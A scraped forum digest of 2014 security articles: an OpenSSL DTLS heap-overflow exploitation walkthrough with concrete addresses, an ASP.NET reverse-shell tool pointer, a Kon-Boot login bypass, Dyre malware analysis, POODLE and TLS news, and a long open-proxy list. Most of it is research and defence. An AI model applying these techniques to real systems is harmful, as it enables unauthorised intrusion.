attacks. Most enterprise organizations would prefer DHCPv6 for desktop LANs, but RAs are still needed on these networks. In a data center, an organization may want to statically assign the address details to hosts and not use RA messages. Regardless, people should not fear the RAs and learn to embrace them. Sursa: https://community.infoblox.com/blogs/2014/06/16/why-you-must-use-icmpv6-router-advertisements-ras

CVE-2014-0195: Adventures in OpenSSL’s DTLS Fragmented Land By Mark Yason December 8, 2014 Earlier this year, details of a remote code execution bug in OpenSSL’s DTLS implementation were published. The following is a look at the bug, its process and the different ways attackers might leverage it for exploitation: Vulnerability On a high level, the bug allows writing past the end of a buffer allocated in the heap, allowing application data or heap metadata to be overwritten. This leads to application crashes or remote code executions, at worst. The bug is due to the way the OpenSSL DTLS parser handles fragmented handshakes. Specifically, it uses the message length specified in the initial fragment for the message buffer allocation, but it uses the message length specified in subsequent fragments to determine whether they are within range of the message. Consider the following fragmented ClientHello message that triggers the bug: When the initial ClientHello fragment is encountered, the parser will allocate a message buffer based on the specified message length (2, in this case). Next, the fragment data “A” (fragment offset = 0, fragment length = 1) is written to the message buffer: Then, when the second ClientHello fragment is parsed, the fragment offset and fragment length is checked to determine whether they are within the range of the message length: Notice that the check uses the message length specified in the current fragment being parsed (msg_hdr->msg_len) and not the message length specified in the initial fragment. Therefore, the check will pass, causing the fragment data “B” (fragment offset = 2, fragment length = 1) to be written past the end of the allocated message buffer: As you may have observed, the bug is interesting in that an attacker has a relatively high control of where (fragment offset), what (fragment data) and how much data (fragment length) can be written. Triggering Now that we have an idea of what the bug is, let’s try to trigger it. For testing, an Ubuntu 14.04 x64 test VM is used. The libssl1.0.0 library is downgraded to a vulnerable version, and the package containing the debugging symbols for the libssl1.0.0 library (libssl1.0.0-dbg) is also installed. Also, a copy of a test server certificate from the OpenSSL project is downloaded to the current directory. Finally, the /usr/bin/openssl tool is invoked with the arguments “s_server” and “-dtls1“; this causes the OpenSSL tool to listen on Port 4433 for DTLS connections. In the example below, the OpenSSL tool is run under valgrind so that the out-of-bounds write is immediately caught: The valgrind log shows some important information, such as which code path caused the message buffer allocation (dtls1_reassemble_fragment() -> dtls1_hm_fragment_new()) and which code path caused the out-of-bounds write (dtls1_reassemble_fragment() -> dtls1_read_bytes()). DTLS Exploitation After understanding the bug, an interesting follow-up exercise is finding ways an attacker might leverage this bug to exploit a real service. This will serve as a great learning experience because it will teach us how attackers think, what their process is and what other weakness they might use to fully leverage the bug. For this task, I first searched for a service that uses OpenSSL’s DTLS component for secure connections, eventually leading me to Net-SNMP’s snmpd. Note that the net-snmp build in Ubuntu has the DTLS option turned off by default, so I had to recompile the net-snmp package with additional options in order to enable DTLS. Once a target service is running, the next step involves attaching to the process, setting breakpoints to the functions (see valgrind log) that were called when the message buffer was allocated and looking at the allocations that occur just after the message buffer allocation. Understanding the allocations that occur after the message buffer allocation allows us to determine which data structures will likely be allocated adjacent to the message buffer (assuming the allocations fit a large enough free chunk or are performed from the top chunk), and therefore, targeted for overwrite. After a lot of experimentation, I eventually found that the following OpenSSL data structure, which is allocated almost immediately after the message buffer allocation, can be leveraged in order to convert the bug to a fairly limited “write arbitrary data to the address pointed to by pointers found in the process” exploit primitive: In the context of DTLS, pitem is a linked list item that is used to track fragmented handshakes. The interesting field is the data field, which, in turn, points to a hm_fragment structure: The hm_fragment structure contains information about the fragmented handshake message state, and more importantly, the message buffer pointer (hm_fragment.fragment). Every time a handshake fragment parsed, the related pitem of the handshake is retrieved, pitem.data is casted to a hm_fragment* and the fragment data (which is controlled by attackers) is read into the buffer pointed to by hm_fragment.fragment: Therefore, using the bug to point pitem.data somewhere in the process address space so that pitem.(hm_fragment*)data->fragment is aligned to a pointer, we can write arbitrary data to wherever pitem.(hm_fragment*)data->fragment points to. To illustrate with an example, suppose the process address space contains the pointer 0x12345678 at address 0x401058. Assuming that the fragment field is at offset +0x58 of the hm_fragment structure, if we use the bug to point pitem.data to 0x401000, the parser will treat 0x401000 as a hm_fragment structure. Therefore, we will be able to write arbitrary data to 0x12345678 because it will be treated as the message buffer pointer: We now have a fairly limited exploit primitive that allows us to leverage pointers in the process address space. The next question then is, “What can we do with it?” Again, after a lot of experimentation and trying out different ideas, I think these two are pretty interesting: WriteN Primitive Instead of leveraging existing pointers in the process address space, we will fill the heap with the address that we want to write data to. This involves spraying the heap with a target address. This is done via multiple DTLS connections that each send a large handshake message containing a repeating series of the target address (0x4141414141414141 in the example below). After the heap spray, the bug is used to point pitem.data to a hard-coded heap address (0x04141414 in the example), where I think (and hope) the series of 0x4141414141414141s are potentially written, causing pitem.(hm_fragment*)data->fragment to point to 0x4141414141414141: As you may have guessed, the downside of this approach is that the hard-coded heap address is unreliable, which is true in the case of snmpd because several uncontrolled allocations will fill the heap in addition to the sprayed target address. Nonetheless, this is an interesting approach for further transforming the bug into a WriteN (write arbitrary data anywhere in the process address space) exploit primitive: Execution (RIP) Control Another approach is taking advantage of the absence of address randomization in cases where ASLR or PIE is disabled. In the case of Ubuntu, it turns out that PIE is not enabled for snmpd; this means that the snmpd executable is always mapped at a static address (0x400000): Because of this, it is possible to leverage interesting pointers stored in the snmpd executable address range and write arbitrary data to where they point at. An example of this is the stderr pointer located at 0x606FE0 in the .got section of snmpd: In turn, that pointer points somewhere in the writable .data section of libc: Looking at the data near stderr in the libc, we can see that stderr+0x18 is an interesting function pointer — which is actually a function pointer dereferenced by malloc() when requesting additional memory from the system: Therefore, for execution (RIP) control, we will use the bug to point pitem.data to 0x606F88 (0x606FE0-0x58) so that pitem.(hm_fragment*)data->fragment points to stderr in libc, causing a write to pitem.(hm_fragment*)data->fragment+0x18 with an arbitrary address. When malloc() dereferences the controlled function pointer, RIP control is achieved: Conclusion After reliably controlling RIP within the amount of time I allocated for research, I declared game over and moved on. However, that is not to say that the consequences of the bug are limited to the ones I described. A determined attacker with a lot of spare time can definitely write a complete and reliable remote exploit using the bug. Also, looking back and thinking like an attacker, converting the bug into an exploit primitive involves a lot of experimentation. It is really a creative but long and laborious process. I lost track of how many times I had to restart the service, attach to the service, explore the heap, think, try an idea, crash the service and start the process all over again. In the end, an attacker’s persistence is what transforms software bugs into working reliable exploits, and as software developers, it is good to always keep that in mind as we read and write our code, triage and fix our bugs and evaluate the use of exploit mitigations in our products. Sursa: CVE-2014-0195: Adventures in OpenSSL's DTLS Fragmented Land

InsomniaShell – ASP.NET Reverse Shell Or Bind Shell InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. ASP.NET is an open source server-side Web application framework designed for Web development to produce dynamic Web pages. It was developed by Microsoft to allow programmers to build dynamic web sites, web applications and web services. It was first released in January 2002 with version 1.0 of the .NET Framework, and is the successor to Microsoft’s Active Server Pages (ASP) technology. ASP.NET is built on the Common Language Runtime (CLR), allowing programmers to write ASP.NET code using any supported .NET language. A bind shell is basically binding the command prompt to a listening port on the compromised machine, a reverse shell is sending a command prompt to a listening port on the attackers machine (used when the hacked server doesn’t have a public IP). InsomniaShell has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. If the provider page is running on a server with a local SQL Server instance, the shell includes functionality for a named pipe impersonation attack. This requires knowledge of the sa password, and results in the theft of the token that the SQL server is executing under. You can download InsomniaShell here: InsomniaShell.zip Sursa: InsomniaShell - ASP.NET Reverse Shell Or Bind Shell - Darknet - The Darkside

[h=3]The POODLE bites again (08 Dec 2014)[/h] October's POODLE attack affected CBC-mode cipher suites in SSLv3 due to SSLv3's under-specification of the contents of the CBC padding bytes. Since SSLv3 didn't say what the padding bytes should be, implementations couldn't check them and that opened SSLv3 up to an oracle attack. We're done pretty well at killing off SSLv3 in response to that. Chrome 39 (released Nov 18th) removed fallback to SSLv3 and Chrome 40 is scheduled to remove SSLv3 completely. Firefox 34 (released Dec 1st) has already removed SSLv3 support. We're removing SSLv3 in favour of TLS because TLS fully specifies the contents of the padding bytes and thus stops the attack. However, TLS's padding is a subset of SSLv3's padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn't check the padding bytes but that wouldn't cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections. This was noted by, at least, Brian Smith on the TLS list ([1][2]) and I was sufficiently cynical to assume that there were probably more instances of this than the old versions of NSS that Brian cited, and so wrote a scanner for the issue. Unfortunately, I found a number of major sites that had this problem. At least one of whom I had good enough contacts at to quickly find that they used an F5 device to terminate connections. I contacted F5 on October 21st and they started working on a fix. Yngve Pettersen also independently found this issue and contacted me about it around this time. F5 reported that some of the affected sites weren't customers of theirs, which meant that there was (at least) a second vendor with the same issue. After more digging, I found that some A10 devices also have this problem. I emailed a number of contacts at A10 on October 30th but sadly didn't get a reply from any of them. It wasn't until November 13th that I found the right person at A10 to deal with this. F5 have posted patches for their products and A10 should be releasing updates today. I'm not completely sure that I've found every affected vendor but, now that this issue is public, any other affected products should quickly come to light. (Citrix devices have an odd behaviour in this area in that they'll accept padding bytes that are all zeros, but not random padding. That's unexpected but I can't make an attack out of it.) Ivan Risti? has added a test for this issue to his excellent scanner at SSLLabs. Affected sites will have their grade set to F and will report “This server is vulnerable to the POODLE attack against TLS servers”. This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad. While RC4 is fundamentally broken and no implementation can save it, attacks against MtE-CBC ciphers have repeatedly been shown to be far more practical. Thankfully, TLS 1.2 support is about to hit 50% at the time of writing. Sursa: https://www.imperialviolet.org/2014/12/08/poodleagain.html

[h=1]Security Analysis of a Full-Body Scanner[/h] Full-body scanners (also known as “advanced imaging technology”) are used as the primary passenger screening mechanism in airports across the United States and many other countries. Despite their critical role in aviation security, these scanners have never been tested for effectiveness, privacy, or safety in a rigorous study that is independent of the manufacturers and government agency customers. This study documents the results of the first such independent evaluation of the Rapiscan Secure 1000, an X-ray backscatter machine that was deployed at TSA airport checkpoints between 2009 and 2013. In laboratory tests with a real machine, we were able to conceal guns, knives, and explosive simulants in such a way that they were not visible to the scanner operator. We also studied the cyberphysical security of the machine and were able to show how an attacker could subvert the operator console software so that it would be possible to conceal all types of contraband. Learn more: Press release Full research paper Image gallery Frequently asked questions (FAQ) [h=2]The Team[/h] The study is a collaboration between researchers at the University of California, San Diego, the University of Michigan, and Johns Hopkins University. To contact the entire team, email radsec-team@umich.edu. Keaton Mowery, Ph.D. student, University of California, San Diego Eric Wustrow, Ph.D. student, University of Michigan Tom Wypych, Ph.D. student, University of California, San Diego Corey Singleton, Radiation Safety Officer, University of California, San Diego Chris Comfort, Health Physicist, University of California, San Diego Eric Rescorla, Visiting Scholar, University of California, San Diego Stephen Checkoway, Assistant Research Professor, Johns Hopkins University J. Alex Halderman, Assistant Professor, University of Michigan Hovav Shacham, Associate Professor, University of California, San Diego Sursa: https://radsec.org/

Bypassing Windows and OSX Logins with NetHunter & Kon-boot DriveDroid support in Kali Linux NetHunter The Kali Linux NetHunter platform has many hidden features which we still haven’t brought to light. One of them is the DriveDroid application and patch set, which have been implemented in NetHunter since v1.0.2. This tool allows us to have NetHunter emulate a bootable ISO or USB, using images of our choosing. That’s right, you can use NetHunter as a boot device which holds a library of bootable ISOs and images…And so we begin: Installing Kali Linux Unattended using your Android Phone Yes, this is actually doable. We can easily generate a custom Kali ISO which has a self installing preseed file and have NetHunter boot it on a target machine. You load up DriveDroid, select the self installing ISO, plug in the USB cable, and reboot the target computer…..and all of a sudden, the Kali Linux install screen whizzes by, and starts installing itself with no user interaction… Bypassing Windows and OSX Logins Using NetHunter and Kon-Boot While the NetHunter HID attacks can provide us pre-programmed keyboard strokes which end up compromising the target machine – what happens if the target machine is turned off, or otherwise requires a login to access? The NetHunter HID attack would be useless at this point. Enter Kon-Boot, a must-have tool for anyone performing physical security assessments. As a quick reminder, Kon-Boot is a boot-kit which will silently boot and bypass the authentication process of Windows/OSX based operating systems, without overwriting your old passwords. We went ahead and purchased a commercial version of Kon-Boot, and tried using the provided Kon-Boot image file as our bootable USB payload. Lo and behold, when we plugged in our NetHunter device USB cable to a target computer, the Kon-Boot image booted and allowed us to bypass a Windows 8.1 login screen. Check out the video below to see it in action: Although this technology isn’t new, this implementation of it is pretty awesome, and complements the NetHunter arsenal of tools and features perfectly. Whats more, this has been battle tested in real-world onsite physical pentests we’ve performed and has proven to be extremely effective. Stay up to date with Kali Linux NetHunter Features As NetHunter development continues, we will try our hardest to make sure we keep you updated with all the existing and upcoming features of this awesome platform. To stay updated with our blogs and posts, make sure you follow us on twitter: Sursa: http://www.offensive-security.com/kali-linux/bypassing-windows-and-osx-logins-with-nethunter-kon-boot/

Dyre Attackers Shift Tactics December 8, 2014 By Ronnie Tokazowski On December 4th, several employees using PhishMe’s Reporter Button for Outlook reported new waves of Dyre phishing. The email appeared normal at first, but further analysis showed that the attackers have made a big shift in order to remain hidden. Here’s what the email looks like: Figure 1 — Dyre phishing email I’m not sure if this was on purpose, if the attacker’s script had some trouble, or if they were click happy, but the same user received several voice message emails. Figure 2 — Several emails reported with the PhishMe Reporter button Upon clicking the link, the user is presented with the option to download a zip file that contains an executable. Once the user visits the page, the background code also renders a counter that counts clicks. Figure 3 — GET request for the counter We can see that this counter has tracked around 10,000 clicks. These aren’t unique, as refreshing the page makes the counter increment by one. Figure 4 — Counter used by Dyre attackers The attackers are also changing the file names per download. Thankfully in our case, the hashes still match. Figure 5 — Hashes of files downloaded from Dyre campaign Once executed, the malware (in this case, Upatre) downloads an encoded payload which is Dyre. Upatre likes to use update-related user-agent strings when grabbing the payload. Figure 6 — Upatre downloading with the user agent string “realUpdate” Upatre also uses other user-agent strings such as “update” and “myupdate”. Looking for user-agent strings that contain these can help find potential infections in a network. Next, Dyre injects into the top-most svchost.exe. We saw this in early versions of Dyre as documented here (http://phishme.com/new-whitepaper-evolution-phish-phishing-delivery-mechanisms/) however it’s only recently that newer versions of Dyre have been capable of injecting into svchost.exe in Windows 7. By dumping the memory, running strings, and grepping for “:443” or “:4443” (ports Dyre uses for communication) we can see C2 IP’s, as well as a new addition. Figure 7 — IP’s dumped from memory with the addition of an i2p address While there is currently no response from this i2p node (Figure 8) there is successful i2p traffic going out from the infected system. (Figure 9) Figure 8 — Failed query for i2p address Figure 9 — Possible i2p traffic attempts For those who are unfamiliar with i2p, think of it as a more secure version of TOR, as things such as the true DNS destination are natively tunneled. I2p has aspects that are peer-to-peer, and every node is considered an exit node. In the case of Dyre, this could be to give the attackers a separate channel for communication, making it more difficult to analyze and detect. However, there are a few things we can do to cut them off. In the memory dump in Figure 7, we can see that the malware is configured to connect to an i2p domain via port 443. In Figure 8, we can see the actual DNS request going out. While we can’t specifically tell what’s going on in this case, by black holing i2p at the top-level domain we stop the propagation of the malware, as well as neuter any possible i2p traffic from a network. On the off chance that the attackers change domains to go over other ports for i2p, by configuring IDS systems to drop “GET /netdb/routerinfo”, we can cut off communications even further. (Figure 10) This applies to both HTTP and HTTPS protocols as well. Figure 10 — Portion of i2p traffic to block Here are the VirusTotal reports for the infections. Upatre: https://www.virustotal.com/en/file/2faf099c27af2c6f93601240e8e5525d6a66abd34a3431929da55982d0e728bc/analysis/ Dyre: https://www.virustotal.com/en/file/5a148aa655b2e175e67205c398736e2a4bfe318cdcc990c1e77da354d8d3db39/analysis/ Thanks to employees clicking the PhishMe Reporter button, we were able to quickly modify our Yara rule to match this latest strain. See the updated Yara rule here: Dyre_12_4 Sursa: Dyre Attackers Shift Tactics - PhishMe

New ‘Fakedebuggerd’ vulnerability in Android 4.x OS lets hackers root access By Vijay on December 8, 2014 · New ‘Fakedebuggerd’ vulnerability in all versions of Android OS upto lollipop, lets hackers root access Security Researchers at Chinese anti-virus company 360 have found out a new vulnerability in the Google’s Android operating system which is named as ‘Fakedebuggerd.’ This new vulnerability allows potential hackers to gain root access to install files and escalate privileges on the smartphones and tablets running on Android OS and run malicious codes at will. As per the 360 researchers, the Fakedebuggerd vulnerability enables a potential attacker to access an area that can be accessed only with system or root permissions. The vulnerability uses two known Android 4.x Privilege Escalation (PE) exploits, ‘FramaRoot’ and ‘TowelRoot’, to run code under root privileges and to install a root toolkit on the device. This allows the potential hacker to hide the code both from the Android user as well as the security solutions running on the devices. As such the hacker may inject any malicious App without users notice. Fakedebuggerd targets Android 4.x devices The vulnerability is of high risk as it gives serious privilege escalation to the handlers of malware and this is the first time the researchers have found out any Privilege Escalation vulnerabilities in Android 4.x. As said above, uses two exploits, TowelRoot’ and ‘FramaRoot’ together which means it has a higher rate of infection as well as higher chances of hiding itself from the AV engines aboard the users device. The Towelroot exploit is based on the futex() syscall vulnerability (CVE-2014-3153). This Linux vulnerability was discovered five months ago by Comex and affects almost all Android devices prior to Android 5.0 lollipop. The other exploit, Framaroot, is basically a rooting tool and based on several exploits for most Samsung, LG, Huawei, Asus and ZTE devices and more. The exploits which form the Framaroot are named after heroes of the popular JRR Tolkein triolgoy “The Lord of the Rings,” like Gandalf, Boromir, Pippin, Legolas, Sam, Frodo, Aragorn and Gimli. Almost all Android smartphones which are made by the above companies are able to execute Framaroot quite easily which makes Fakedebggerd very powerful vector. Modus Operandi Once the Fakedebuggerd vulnerability is exploited and the root toolkit is deployed on the infected device, malicious code to collects sensitive data like unique identifiers, device versions and network connectivity data. Additionally it will install unnecessary Apps like Flashlight and Calender without the users permission. The Fakedbuggerd is quite aggressive in its intent and uses extreme measures to keep them installed. Even if these Apps are removed by user using root privileges, the Fakedbuggerd reinstalls them automatically using the PE exploit. And as said above due the malware’s perfect hiding technique, simply deleting the suspicious apps wont work in this case. The Fakedbuggerd malware is a serious threat because of its ability to access root privileges and run malware laden codes on infected devices. In today’s world of convergence when the critical and confidential enterprise data and mobile phones are interconnected, Fakebuggerd can cause havoc unseen before. As of now no security solution or antivirus can detect this malware, therefore precaution is the best remedy against getting infected through this vulnerability. Stay away from third-party and unverified APKs and use the official Google Play Apps for download. Even if you have to download a APK, stick with trusted and well-reviewed app developers. Beware fake advertisements (malvertisements) and phishing links on all forms of communication – SMS, email and social networks. Resource : 360 Blog. Sursa: New 'Fakedebuggerd' vulnerability in Android 4.x OS lets hackers root access

[LIST=1]09-12-14 | Fast Proxy Server List (3678) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.161.120.215:9064 1.161.141.187:9064 1.161.154.60:9064 1.164.170.193:8088 1.164.178.230:9064 1.165.107.142:9064 1.165.16.84:8088 1.168.10.162:9064 1.168.228.89:9064 1.168.8.187:9064 1.169.131.190:9064 1.170.121.72:9064 1.171.12.36:9064 1.171.13.30:9064 1.172.21.178:9064 1.172.22.49:9064 1.172.24.123:9064 1.172.29.1:9064 1.173.115.188:9064 1.174.0.72:9064 1.174.141.166:9064 1.174.242.11:9064 1.174.61.238:9064 1.175.42.191:9064 1.191.248.215:8585 1.22.120.108:9064 1.22.132.91:9064 1.23.168.194:9064 1.23.174.25:9064 1.23.189.95:9064 1.34.22.177:9064 1.93.8.169:3128 101.0.60.177:9064 101.1.16.123:3128 101.18.28.127:8585 101.226.12.223:80 101.251.102.122:3128 101.251.226.195:8888 101.251.238.123:8080 101.29.93.218:8585 101.63.156.218:9064 101.63.211.236:9064 101.63.214.28:9064 101.63.89.192:9064 103.16.157.141:80 103.16.177.140:9064 103.18.220.69:8080 103.240.96.40:9064 103.243.114.26:8080 103.248.248.121:8080 104.131.102.107:3128 104.131.81.106:3128 104.140.67.36:7808 104.140.67.36:8089 104.143.5.133:7808 104.143.5.133:8089 104.194.14.68:7808 104.194.14.68:8089 106.1.29.15:9064 106.104.66.93:9064 106.186.24.144:3128 106.218.252.130:9064 106.37.177.251:3128 106.83.238.65:8118 107.150.224.29:3128 107.150.224.29:80 107.150.224.29:8080 107.150.224.29:8180 107.170.254.23:3128 107.182.17.243:7808 107.182.17.243:8089 109.104.144.42:8080 109.236.88.144:25008 109.236.88.144:25012 109.60.249.107:3128 110.173.49.18:3128 110.232.83.38:8080 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.77.181.17:8080 110.77.233.229:3128 110.78.184.115:9064 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:3128 111.1.32.20:8085 111.1.32.20:8086 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8088 111.1.32.24:81 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.133:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.164:80 111.1.36.166:80 111.1.36.167:80 111.1.36.2:80 111.1.36.21:80 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 111.1.36.25:82 111.1.36.25:83 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.4:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.1.60.163:80 111.1.61.74:80 111.10.100.155:8123 111.10.100.57:8123 111.10.100.70:8123 111.10.101.103:8123 111.10.101.219:8123 111.10.103.43:8123 111.10.112.162:8123 111.10.112.45:8123 111.10.112.71:8123 111.10.113.231:8123 111.10.114.51:8123 111.10.115.123:8123 111.10.116.206:8123 111.10.117.88:8123 111.10.118.5:8123 111.10.118.63:8123 111.10.12.3:8123 111.10.128.38:8123 111.10.136.187:8123 111.10.136.196:8123 111.10.136.35:8123 111.10.137.177:8123 111.10.138.32:8123 111.10.139.123:8123 111.10.139.185:8123 111.10.14.208:8123 111.10.144.80:8123 111.10.146.107:8123 111.10.146.17:8123 111.10.146.21:8123 111.10.146.251:8123 111.10.146.36:8123 111.10.147.217:8123 111.10.147.231:8123 111.10.147.93:8123 111.10.152.238:8123 111.10.152.81:8123 111.10.153.210:8123 111.10.154.15:8123 111.10.154.65:8123 111.10.155.66:8123 111.10.157.68:8123 111.10.158.216:8123 111.10.161.205:8123 111.10.164.61:8123 111.10.165.56:8123 111.10.165.7:8123 111.10.165.70:8123 111.10.166.194:8123 111.10.166.35:8123 111.10.167.161:8123 111.10.167.80:8123 111.10.168.37:8123 111.10.169.106:8123 111.10.187.140:8123 111.10.187.182:8123 111.10.194.50:8123 111.10.195.65:8123 111.10.198.179:8123 111.10.199.219:8123 111.10.28.197:8123 111.10.44.191:8123 111.10.45.139:8123 111.10.45.35:8123 111.10.48.29:8123 111.10.49.168:8123 111.10.49.255:8123 111.10.57.156:8123 111.10.58.38:8123 111.10.71.110:8123 111.10.79.146:8123 111.10.88.64:8123 111.10.89.182:8123 111.10.89.205:8123 111.10.90.214:8123 111.10.90.75:8123 111.10.98.239:8123 111.10.98.250:8123 111.10.98.76:8123 111.10.99.213:8123 111.119.192.34:8080 111.12.128.167:80 111.12.128.171:80 111.12.128.171:8060 111.12.128.171:8080 111.12.128.172:80 111.12.128.172:8089 111.13.109.51:80 111.13.109.52:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.13.55.3:22 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.174.225.44:8118 111.175.133.129:8585 111.184.102.113:9064 111.185.185.163:9064 111.198.216.86:8585 111.2.241.200:8123 111.206.81.248:80 111.240.110.183:9064 111.240.170.153:9064 111.240.66.51:9064 111.242.199.32:9064 111.242.2.160:9064 111.243.64.246:9064 111.248.178.236:9064 111.248.221.48:8088 111.248.76.82:9064 111.249.96.133:8088 111.250.169.115:9064 111.250.172.95:9064 111.250.189.8:9064 111.250.191.170:8088 111.251.111.191:9064 111.251.122.107:9064 111.251.222.136:9064 111.251.247.46:9064 111.252.135.133:9064 111.252.201.56:9064 111.252.30.229:9064 111.253.144.30:9064 111.253.64.177:9064 111.254.148.210:9064 111.254.161.22:9064 111.254.240.73:9064 111.255.250.160:9064 111.255.53.138:9064 111.40.194.48:80 111.7.129.140:80 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8086 111.7.129.150:8088 111.7.129.151:80 111.7.129.160:80 111.7.129.160:8087 111.7.129.162:80 111.7.129.162:8085 111.7.129.162:8086 111.76.115.67:8585 111.9.125.236:8123 111.9.139.43:8123 111.9.161.81:8123 111.9.174.195:8123 111.9.234.159:8123 111.9.85.132:8123 111.91.38.87:9064 111.91.56.133:9064 111.91.80.166:9064 111.92.17.196:9064 112.0.136.121:8123 112.0.136.123:8123 112.0.192.237:8123 112.0.221.58:8123 112.1.102.150:8123 112.1.172.223:8123 112.1.177.78:8123 112.104.123.239:9064 112.104.89.131:9064 112.105.228.19:9064 112.105.244.92:8088 112.105.84.58:8088 112.124.64.221:8000 112.15.111.27:8123 112.15.118.197:8123 112.15.22.132:8123 112.15.95.210:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.10.204:8123 112.18.152.224:8123 112.18.154.109:8123 112.18.154.6:8123 112.18.155.161:8123 112.18.161.130:8123 112.18.161.170:8123 112.18.161.199:8123 112.18.162.224:8123 112.18.163.239:8123 112.18.163.39:8123 112.18.164.133:8123 112.18.164.171:8123 112.18.164.251:8123 112.18.165.138:8123 112.18.165.226:8123 112.18.167.205:8123 112.18.168.23:8123 112.18.168.79:8123 112.18.170.117:8123 112.18.170.129:8123 112.18.170.176:8123 112.18.170.79:8123 112.18.171.120:8123 112.18.171.188:8123 112.18.172.182:8123 112.18.175.177:8123 112.18.176.53:8123 112.18.177.101:8123 112.18.177.64:8123 112.18.177.90:8123 112.18.178.185:8123 112.18.178.199:8123 112.18.178.85:8123 112.18.179.143:8123 112.18.179.48:8123 112.18.181.164:8123 112.18.184.131:8123 112.18.186.15:8123 112.18.186.240:8123 112.18.186.50:8123 112.18.187.17:8123 112.18.187.177:8123 112.18.187.95:8123 112.18.193.5:8123 112.18.193.60:8123 112.18.194.20:8123 112.18.194.55:8123 112.18.195.110:8123 112.18.196.58:8123 112.18.199.207:8123 112.18.21.131:8123 112.18.23.240:8123 112.18.4.206:8123 112.18.54.103:8123 112.18.54.169:8123 112.18.59.84:8123 112.18.65.35:8123 112.18.68.113:8123 112.18.68.174:8123 112.18.7.234:8123 112.18.71.62:8123 112.18.73.189:8123 112.18.79.148:8123 112.194.138.195:80 112.199.65.210:8080 112.2.204.171:8123 112.20.107.222:8123 112.20.110.61:8123 112.20.117.36:8123 112.20.138.112:8123 112.20.140.92:8123 112.20.140.94:8123 112.20.200.138:8123 112.20.200.71:8123 112.20.205.156:8123 112.20.96.82:18186 112.21.149.3:8123 112.21.176.219:8123 112.21.243.13:8123 112.21.249.213:8123 112.21.252.4:8123 112.22.150.151:8123 112.22.228.246:8123 112.22.228.94:8123 112.22.233.124:8123 112.22.237.65:8123 112.23.105.182:8123 112.23.109.44:8123 112.23.111.81:8123 112.23.61.127:8123 112.24.124.41:8123 112.24.126.197:8123 112.24.40.233:8123 112.24.67.134:8123 112.253.14.227:80 112.253.14.227:8080 112.3.104.101:8123 112.3.109.57:8123 112.3.135.187:8123 112.3.135.66:8123 112.3.165.55:8123 112.3.199.67:8123 112.3.28.29:8123 112.44.213.109:8123 112.44.215.167:8123 112.44.225.6:8123 112.44.226.94:8123 112.44.230.230:8123 112.44.232.43:8123 112.44.234.104:8123 112.44.239.5:8123 112.44.240.118:8123 112.44.240.159:8123 112.44.241.204:8123 112.44.246.7:8123 112.44.252.82:8123 112.45.177.132:8123 112.45.177.140:8123 112.45.182.117:8123 112.45.185.33:8123 112.5.16.50:80 112.85.70.2:80 113.105.224.77:80 113.105.224.79:80 113.107.57.76:3128 113.107.57.76:80 113.19.210.202:9064 113.19.99.92:9064 113.193.88.186:9064 113.21.73.32:9064 113.214.13.1:8000 113.250.101.69:8118 113.252.150.233:3128 113.4.246.213:8585 113.6.252.139:808 114.112.192.195:3128 114.112.91.97:90 114.219.107.201:8585 114.24.200.56:9064 114.24.4.184:9064 114.252.123.90:8118 114.254.147.169:3128 114.255.183.163:8080 114.255.183.164:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.73.178:9064 114.26.78.174:9064 114.27.108.36:9064 114.27.18.224:9064 114.36.136.167:9064 114.36.37.213:9064 114.36.59.90:9064 114.37.100.106:9064 114.37.124.18:9064 114.37.151.139:9064 114.37.186.106:8088 114.37.186.247:9064 114.37.77.174:9064 114.38.225.135:9064 114.38.233.221:9064 114.38.244.193:9064 114.38.83.224:9064 114.39.169.207:9064 114.39.244.150:9064 114.40.103.88:9064 114.40.108.12:9064 114.40.19.99:9064 114.40.63.192:9064 114.40.94.223:9064 114.42.168.111:9064 114.42.67.20:8088 114.43.121.11:8088 114.43.128.63:9064 114.43.17.108:9064 114.43.197.211:9064 114.44.41.69:9064 114.45.24.35:9064 114.45.32.205:9064 114.46.74.149:9064 114.47.173.196:8088 114.47.5.115:8088 114.79.171.175:9064 115.124.89.62:3128 115.154.191.110:3128 115.154.225.119:8585 115.187.48.246:9064 115.236.59.194:3128 115.242.178.128:9064 115.244.232.222:9064 115.248.217.178:3128 115.252.167.220:9064 115.28.137.189:3128 115.29.247.115:8888 115.68.53.117:8080 115.70.67.58:8080 115.71.233.88:8080 115.98.130.142:9064 115.99.0.9:9064 116.193.129.119:9064 116.202.34.78:9064 116.202.42.33:9064 116.203.177.183:9064 